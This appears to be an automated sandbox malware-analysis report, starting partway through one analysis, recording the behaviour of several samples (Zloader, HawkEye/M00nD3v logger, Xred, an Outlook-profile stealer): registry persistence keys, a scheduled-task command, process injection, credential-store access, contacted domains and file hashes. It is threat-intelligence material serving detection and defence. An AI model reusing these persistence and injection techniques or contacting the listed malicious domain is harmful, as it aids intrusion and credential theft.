| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3156 set thread context of 4720 | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\mouse_2.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\mouse_2.exe
"C:\Users\Admin\AppData\Local\Temp\mouse_2.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aqkfZm" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCFFD.tmp"
C:\Users\Admin\AppData\Local\Temp\mouse_2.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3156-0-0x00000000750CE000-0x00000000750CF000-memory.dmp
memory/3156-1-0x0000000000F30000-0x000000000102C000-memory.dmp
memory/3156-2-0x0000000007F40000-0x0000000008000000-memory.dmp
memory/3156-3-0x000000000B7B0000-0x000000000BD54000-memory.dmp
memory/3156-4-0x000000000B3A0000-0x000000000B432000-memory.dmp
memory/3156-5-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/3156-6-0x0000000005B60000-0x0000000005B6A000-memory.dmp
memory/3156-7-0x0000000006A90000-0x0000000006A98000-memory.dmp
memory/3156-8-0x00000000750CE000-0x00000000750CF000-memory.dmp
memory/3156-9-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/3156-10-0x0000000007160000-0x00000000071FC000-memory.dmp
memory/3156-11-0x0000000007380000-0x000000000742E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpCFFD.tmp
| MD5 | ab6ef14bbdee8c6ad96136f5c675f0e1 |
| SHA1 | b037ff482478fda0a5ee4e7054658a4a5e3cf74b |
| SHA256 | 228fb9edb9559964f1a50a48e044f24be3ac2c9c84e0c6d3e5791e7d4e2eb3d4 |
| SHA512 | f5b26b8330f2d9a36dfcf245531382e9a329136267aa71033f7603f1976796bde468c40e9b1d1938d7d165ade9206f5461ba4271295a6de28cb4b2b2dc7aa57a |
memory/4720-15-0x0000000000400000-0x00000000004A8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mouse_2.exe.log
| MD5 | 400f1cc1a0a0ce1cdabda365ab3368ce |
| SHA1 | 1ecf683f14271d84f3b6063493dce00ff5f42075 |
| SHA256 | c8fa64f4b69df13ed6408fd4a204f318a36c2f38c85d4a4d42adfc9173f73765 |
| SHA512 | 14c8cfd58d097e5e89c8cabe1e665173f1ccf604a9ef70cdcb84116e265f90819c19c891be408e0ad7e29086a5c2ea2883b7a7d1184878dbbac63e2cabcd1c45 |
memory/4720-18-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/3156-21-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-20-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-19-0x00000000053B0000-0x00000000053F4000-memory.dmp
memory/4720-22-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/4720-23-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-31-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-35-0x0000000008080000-0x00000000080D0000-memory.dmp
memory/4720-36-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-37-0x00000000750C0000-0x0000000075870000-memory.dmp
memory/4720-48-0x00000000750C0000-0x0000000075870000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
155s
Command Line
Signatures
Zloader family
Zloader, Terdot, DELoader, ZeusSphinx
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Egnuhu = "C:\\Users\\Admin\\AppData\\Roaming\\Idiq\\waytol.exe" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4572 set thread context of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4572 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4572 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4572 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4572 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4572 wrote to memory of 4280 | N/A | C:\Users\Admin\AppData\Local\Temp\wwf[1].exe | C:\Windows\SysWOW64\msiexec.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\wwf[1].exe
"C:\Users\Admin\AppData\Local\Temp\wwf[1].exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | militanttra.at | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4572-0-0x0000000000533000-0x0000000000536000-memory.dmp
memory/4572-1-0x0000000000340000-0x000000000058C000-memory.dmp
memory/4572-2-0x0000000000340000-0x000000000058C000-memory.dmp
memory/4572-4-0x0000000000533000-0x0000000000536000-memory.dmp
memory/4280-10-0x0000000000A40000-0x0000000000A6C000-memory.dmp
memory/4572-12-0x0000000000340000-0x000000000058C000-memory.dmp
memory/4280-14-0x0000000000A40000-0x0000000000A6C000-memory.dmp
memory/4280-15-0x0000000000A40000-0x0000000000A6C000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
156s
Command Line
Signatures
HawkEye Reborn
Hawkeye_reborn family
M00nd3v_Logger
M00nd3v_logger family
M00nD3v Logger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | bot.whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3620 set thread context of 3632 | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe
"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe"
C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010(1).exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bot.whatismyipaddress.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/3620-0-0x0000000074BE2000-0x0000000074BE3000-memory.dmp
memory/3620-1-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3620-2-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3620-3-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-4-0x0000000000400000-0x0000000000490000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\hyundai steel-pipe- job 8010(1).exe.log
| MD5 | fad44290d2f569240416a287677a6b34 |
| SHA1 | 0799266664e37852987cc24398f9a70c7e56742b |
| SHA256 | e955c99499359471526e95c22a084d1578997c39ecab988badf6798cfbd995b0 |
| SHA512 | ee4136ac147d41646368eeb16390598c1da2b9e3bb8331b43062a72e4ad1d05eec56dcc727f9b5b447756c3edc855b08ef0c241073a5f88e749714f2beb98bc3 |
memory/3632-8-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3620-7-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-10-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-9-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-11-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-13-0x0000000074BE0000-0x0000000075191000-memory.dmp
memory/3632-14-0x0000000074BE0000-0x0000000075191000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
157s
Command Line
Signatures
Xred
Xred family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
